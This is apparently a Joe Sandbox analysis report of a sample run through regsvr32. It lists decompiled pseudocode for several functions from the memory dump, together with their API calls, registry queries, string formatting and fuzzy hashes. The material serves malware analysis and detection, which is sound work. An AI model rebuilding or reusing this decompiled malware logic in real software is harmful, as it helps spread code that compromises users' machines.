API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 3d690748a911728c8652af9999beca9eb4213fb2ddeb6567db40e7aadea67ffc
Instruction ID: 4943538f00786a76d24f7ed44450f43c32c2680e1f9a9d8449de303ceaeefb0f
Opcode Fuzzy Hash: 3d690748a911728c8652af9999beca9eb4213fb2ddeb6567db40e7aadea67ffc
Instruction Fuzzy Hash: 7121F87280069DAFCF11AF95DC80CEE7B69EB68390B458035FE15AB120D732DDA4DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E4D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E001E4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E001E6837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x001e4d15
0x001e4d19
0x001e4d1a
0x001e4d1b
0x001e4d1d
0x001e4d1f
0x001e4d24
0x001e4d27
0x001e4dbe
0x001e4dc5
0x001e4dc5
0x001e4d30
0x001e4d37
0x001e4d47
0x001e4d47
0x001e4d4d
0x001e4d4f
0x001e4d54
0x001e4d5d
0x001e4d65
0x001e4d68
0x001e4d73
0x001e4d77
0x001e4d79
0x001e4d7a
0x001e4d83
0x001e4d87
0x001e4d98
0x001e4d89
0x001e4d8e
0x001e4d93
0x001e4da2
0x001e4da2
0x001e4d77
0x001e4da8
0x001e4dae
0x001e4dae
0x001e4db7
0x001e4dbc
0x001e4dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 001E4D37
lstrlenW.KERNEL32(?), ref: 001E4D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 001E4D8E
SysFreeString.OLEAUT32(?), ref: 001E4DA2

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 8598ff3d6f808a398827f8ee4aee550be7a4bfccfbd0170e72675fd0fe5cf190
Instruction ID: c6cb8245338f5dab4cdcb37e4cdbf8b91f0845e18928824cf387a6d0cbb1989b
Opcode Fuzzy Hash: 8598ff3d6f808a398827f8ee4aee550be7a4bfccfbd0170e72675fd0fe5cf190
Instruction Fuzzy Hash: 2C213D75A00659EFCB10DFE9C8849DEBBB9FF68351B1141A9F906E7210E770DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E1AB8, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E1AB8(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E001E4C8C(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x1ea2d4; // 0x4c1d5a8
				_t4 = _t24 + 0x1ebd60; // 0x4e09308
				_t5 = _t24 + 0x1ebd08; // 0x4f0053
				_t26 = E001E5384( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x1ea2d4; // 0x4c1d5a8
						_t11 = _t32 + 0x1ebd54; // 0x4e092fc
						_t48 = _t11;
						_t12 = _t32 + 0x1ebd08; // 0x4f0053
						_t52 = E001E5D37(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x1ea2d4; // 0x4c1d5a8
							_t13 = _t35 + 0x1ebd9e; // 0x30314549
							if(E001E74B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x1ea2b4 - 6;
								if( *0x1ea2b4 <= 6) {
									_t42 =  *0x1ea2d4; // 0x4c1d5a8
									_t15 = _t42 + 0x1ebbaa; // 0x52384549
									E001E74B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x1ea2d4; // 0x4c1d5a8
							_t17 = _t38 + 0x1ebd98; // 0x4e09340
							_t18 = _t38 + 0x1ebd70; // 0x680043
							_t45 = E001E1F7A(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x1ea290, 0, _t52);
						}
					}
					HeapFree( *0x1ea290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E001E3C84(_t54);
				}
				return _t45;
			}

0x001e1ab8
0x001e1ac8
0x001e1acb
0x001e1ad2
0x001e1ad4
0x001e1ad4
0x001e1ad7
0x001e1adc
0x001e1ae3
0x001e1af0
0x001e1af5
0x001e1af9
0x001e1b07
0x001e1b15
0x001e1b19
0x001e1baa
0x001e1baa
0x001e1b1f
0x001e1b1f
0x001e1b24
0x001e1b24
0x001e1b2b
0x001e1b37
0x001e1b39
0x001e1b3b
0x001e1b3d
0x001e1b44
0x001e1b56
0x001e1b58
0x001e1b5f
0x001e1b61
0x001e1b68
0x001e1b73
0x001e1b73
0x001e1b5f
0x001e1b78
0x001e1b7d
0x001e1b84
0x001e1ba2
0x001e1ba4
0x001e1ba4
0x001e1b3b
0x001e1bb6
0x001e1bb6
0x001e1bb8
0x001e1bbd
0x001e1bbf
0x001e1bbf
0x001e1bca

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E09308,00000000,?,74B5F710,00000000,74B5F730), ref: 001E1B07
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E09340,?,00000000,30314549,00000014,004F0053,04E092FC), ref: 001E1BA4
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001E20B0), ref: 001E1BB6

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d0e503371d6207750d575c643877444ac1256cf3cf8294440627e7a168b6cf62
Instruction ID: 19dddb48735c5d0480d5bad34f33ce5da79eb48c58af6ec751999c2ff23d5c41
Opcode Fuzzy Hash: d0e503371d6207750d575c643877444ac1256cf3cf8294440627e7a168b6cf62
Instruction Fuzzy Hash: 85318C3290058ABFDB119BD1DDC4EAE7BB9FF44744F140095B604AB461D3716A449B52

Uniqueness

Uniqueness Score: -1.00%

Function 001E5F9A, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E001E5F9A(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x1ea2d4; // 0x4c1d5a8
				_t2 = _t22 + 0x1eb662; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x1ea2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x1ea2a4 =  *0x1ea2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E001E283A(_t49, _t48); // executed
					_t33 = E001E738C(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x1ea2a4 < 5) {
							 *0x1ea2a4 =  *0x1ea2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E001E1492();
					HeapFree( *0x1ea290, 0, _t48);
					goto L9;
				}
				_t50 =  *0x1ea390; // 0x4e08d5d
				if(RtlAllocateHeap( *0x1ea290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E001E46D1(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x001e5f9a
0x001e5f9a
0x001e5fa1
0x001e5fa8
0x001e5fac
0x001e5fb1
0x001e5fbc
0x001e5fcc
0x001e600f
0x001e6013
0x001e6017
0x001e6018
0x001e601b
0x001e6020
0x001e6020
0x001e6023
0x001e6027
0x001e6061
0x001e6061
0x001e6067
0x001e606e
0x001e606e
0x001e6029
0x001e602c
0x001e602e
0x001e603b
0x001e603d
0x001e6044
0x001e607b
0x001e6080
0x001e6082
0x001e6084
0x001e6084
0x00000000
0x001e6082
0x001e6046
0x001e604d
0x001e605b
0x00000000
0x001e605b
0x001e5fce
0x001e5fe9
0x001e6003
0x00000000
0x001e6003
0x001e5ffc
0x00000000

APIs

wsprintfA.USER32 ref: 001E5FBC
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001E5FE1

Part of subcall function 001E46D1: GetTickCount.KERNEL32 ref: 001E46E8
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E4735
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E4752
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E4772
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E4790
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E47B3
Part of subcall function 001E46D1: wsprintfA.USER32 ref: 001E47D4

HeapFree.KERNEL32(00000000,001E20FA,?,?,001E20FA,?), ref: 001E605B

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$AllocateCountFreeTick
String ID:
API String ID: 2794511967-0
Opcode ID: 06e22e83400570ae6f05e71182114d4028b61fe2f048e4d723cb23c83b612c66
Instruction ID: 09d7732be20258821d3ab7e656be574df2f32dacc28271fa62739347fbb40bad
Opcode Fuzzy Hash: 06e22e83400570ae6f05e71182114d4028b61fe2f048e4d723cb23c83b612c66
Instruction Fuzzy Hash: AF314C7150019AEFCB01DF95DC84A9E3BBCFF18380F544022FA05AB651D735A994CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E2F68, Relevance: 4.6, APIs: 3, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E001E2F68(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0x1ea290, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E001E77A4(_t57 - _a4, _a4, _t48);
							_t38 = E001E77A4(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E001E77A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x001e2f70
0x001e2f75
0x001e2f77
0x001e2f7e
0x001e2f90
0x001e2f90
0x001e2f94
0x001e2f96
0x001e2f99
0x001e2f9c
0x001e2fa5
0x001e2faf
0x001e2fb3
0x001e2fb8
0x001e2fc8
0x001e2fce
0x001e2fd2
0x001e3021
0x001e2fd4
0x001e2fd4
0x001e2fdd
0x001e2fec
0x001e2ff1
0x001e2ffe
0x001e3007
0x001e3012
0x001e3019
0x001e301d
0x001e301d
0x001e2fd2
0x001e3028
0x001e302f

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 001E2F9C
StrStrA.SHLWAPI(00000000,?), ref: 001E2FA9
RtlAllocateHeap.NTDLL(00000000,?), ref: 001E2FC8

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID:
API String ID: 556738718-0
Opcode ID: c2a0b9d0d5ed1cea030a2216ed5333665b34bcc1673608882cd6195db2051bed
Instruction ID: 01f39f4840f7c12e402f774618501f4b05c49c2dac3e9baf5506648d9a484962
Opcode Fuzzy Hash: c2a0b9d0d5ed1cea030a2216ed5333665b34bcc1673608882cd6195db2051bed
Instruction Fuzzy Hash: 9C217C35600589AFDF11DFA9C888B9EBFB5EF85700F088154F814AB315C731EA55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001E71A5, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E71A5(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x1ea2d4; // 0x4c1d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x1eba30; // 0x4f0053
				_v16 = 4;
				_t31 = E001E3875(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x1ea2d4; // 0x4c1d5a8
					_t5 = _t19 + 0x1eba8c; // 0x6e0049
					_t34 = E001E3875(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E001E50CA(_t34);
					}
					E001E50CA(_t31);
				}
				return _v8;
			}

0x001e71ab
0x001e71b0
0x001e71b5
0x001e71bc
0x001e71c8
0x001e71cc
0x001e71ce
0x001e71d4
0x001e71e0
0x001e71e4
0x001e71f7
0x001e71ff
0x001e7213
0x001e721b
0x001e721d
0x001e721d
0x001e7224
0x001e7224
0x001e722b
0x001e722b
0x001e7231
0x001e7236
0x001e723c

APIs

Part of subcall function 001E3875: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001E71C8,004F0053,00000000,?), ref: 001E387E
Part of subcall function 001E3875: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001E71C8,004F0053,00000000,?), ref: 001E38A8
Part of subcall function 001E3875: memset.NTDLL ref: 001E38BC

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 001E71F7
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 001E7213
RegCloseKey.ADVAPI32(00000000), ref: 001E7224

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 4a46986003cda50905e896e21d777f8efc9c95858972c8a8f41934319b11fee7
Instruction ID: a721ac4a15abae86f6c0f5012a0520f949556e97e1959ff2a9df69b68e19a365
Opcode Fuzzy Hash: 4a46986003cda50905e896e21d777f8efc9c95858972c8a8f41934319b11fee7
Instruction Fuzzy Hash: 40116D7290068AFBEB11DBD5DC89FAEB7BCAF44704F100069B601EB051EB70EA049B61

Uniqueness

Uniqueness Score: -1.00%

Function 001E181D, Relevance: 3.8, APIs: 3, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001E181D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E001E6837(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x1ea324, 0x110);
					_t27 =  *0x1ea328; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E001E5F68(0x110, _a4, _t27, 0);
					}
					if(E001E2BB0( &_v36) != 0) {
						_t35 = E001E39C5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E001E2BE3(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0x8b4875fc
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E001E50CA(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E001E50CA(_a4);
				}
				return _v16;
			}

0x001e1823
0x001e1828
0x001e1835
0x001e1838
0x001e183b
0x001e1842
0x001e1845
0x001e1853
0x001e1858
0x001e185d
0x001e1862
0x001e1864
0x001e186c
0x001e186c
0x001e187b
0x001e1890
0x001e1897
0x001e189e
0x001e18a4
0x001e18aa
0x001e18b2
0x001e18b8
0x001e18bb
0x001e18c8
0x001e18cd
0x001e18d1
0x001e18d1
0x001e1897
0x001e18dc
0x001e18e7
0x001e18e7
0x001e18f3

APIs

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

memcpy.NTDLL(00000000,00000110,001E20FA,001E20FA,?,?,001E20FA,?,?,001E6042,?), ref: 001E1853
memset.NTDLL ref: 001E18C8
memset.NTDLL ref: 001E18DC

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: f2f0e48200f17bf89e8b5d6b837db03b124d293c91e0b978877593548452e4c5
Instruction ID: 16bcce7ccb13cfddfc09fce477e8a5a1ec40d8f609fb425ffc77ae859b71d841
Opcode Fuzzy Hash: f2f0e48200f17bf89e8b5d6b837db03b124d293c91e0b978877593548452e4c5
Instruction Fuzzy Hash: 1A215175A00A58BBDB11AFA6CC41FEE7BB8AF19750F444015F914E7251D774DA00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E1206, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E001E1206(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x1ea2d4; // 0x4c1d5a8
				_t4 = _t49 + 0x1eb418; // 0x4e089c0
				_t5 = _t49 + 0x1eb408; // 0x9ba05972
				_t51 =  *0x1ea140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x1ea2d4; // 0x4c1d5a8
						_t30 = _t56 + 0x1eb3f8; // 0x4e089a0
						_t31 = _t56 + 0x1eb428; // 0x4c96be40
						_t58 =  *0x1ea114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x1ea2d4; // 0x4c1d5a8
											_t23 = _t76 + 0x1eb3f8; // 0x4e089a0
											_t24 = _t76 + 0x1eb428; // 0x4c96be40
											_t105 =  *0x1ea114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x1ea2d4; // 0x4c1d5a8
													_t67 = _v28;
													_t40 = _t99 + 0x1eb3e8; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x001e1211
0x001e1213
0x001e121a
0x001e121b
0x001e121c
0x001e121d
0x001e1223
0x001e1228
0x001e1232
0x001e1239
0x001e123f
0x001e1243
0x001e1249
0x001e1251
0x001e1252
0x001e1257
0x001e1258
0x001e125a
0x001e125d
0x001e125e
0x001e125f
0x001e1265
0x001e12fa
0x001e12ff
0x001e1306
0x001e1310
0x001e1316
0x001e1318
0x001e131e
0x00000000
0x001e126b
0x001e126b
0x001e1272
0x001e127b
0x001e127f
0x001e1285
0x001e1288
0x001e12ef
0x00000000
0x001e128a
0x001e128a
0x001e1321
0x001e1323
0x00000000
0x00000000
0x001e1290
0x001e1290
0x001e1290
0x001e1297
0x001e129d
0x001e12a2
0x001e12aa
0x001e12ab
0x001e12ac
0x001e12ae
0x001e12b2
0x001e12b6
0x00000000
0x001e12b8
0x001e12bc
0x001e12c1
0x001e12c8
0x001e12d8
0x001e12da
0x001e12e0
0x001e12e5
0x001e1325
0x001e1325
0x001e1332
0x001e1336
0x001e133b
0x001e1341
0x001e1346
0x001e1350
0x001e1352
0x001e1358
0x001e1358
0x001e135b
0x001e1361
0x00000000
0x00000000
0x00000000
0x001e12e5
0x00000000
0x001e12e7
0x001e12e7
0x001e12e8
0x00000000
0x001e12ed
0x001e128a
0x001e1288
0x001e127f
0x001e1364
0x001e1364
0x001e136a
0x001e136a
0x001e1373

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04E089A0,001E2932,?,?,?,?,?,?,?,?,?,?,?,001E2932), ref: 001E12D2
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04E089A0,001E2932,?,?,?,?,?,?,?,001E2932,00000000,00000000,00000000,006D0063), ref: 001E1310

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: fb43baf89f33622f40fc948c2b95dbe5304f52e9131b51b8f53f69984150a6f3
Instruction ID: fa66566da2d23032a97b0ee6ffeded88b630fc5b45e22534dd7ddaea762224c9
Opcode Fuzzy Hash: fb43baf89f33622f40fc948c2b95dbe5304f52e9131b51b8f53f69984150a6f3
Instruction Fuzzy Hash: CA516DB5D0065AAFCB00DFE9C888DEEB7B9FF48710B154598EA05EB211D731AD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E6872, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001E6872(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
